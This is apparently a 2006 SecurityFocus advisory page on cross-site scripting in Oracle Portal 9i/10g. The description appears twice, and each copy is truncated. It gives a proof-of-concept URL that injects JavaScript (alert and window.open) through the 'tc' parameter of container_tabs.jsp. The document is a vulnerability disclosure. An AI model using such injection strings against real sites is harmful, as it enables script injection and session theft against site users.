Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Oracle Applications/Portal 9i/10g Cross Site Scripting
Dec 22 2006 08:30AM
putosoft softputo (hasecorp hotmail com)
Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the
Oracle Portal. The following is one that you may found in any version:
http://<target>/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('
Hello!');window.open('http://www.oracle.com/?fix_sec...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the
Oracle Portal. The following is one that you may found in any version:
http://<target>/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('
Hello!');window.open('http://www.oracle.com/?fix_sec...
[ more ]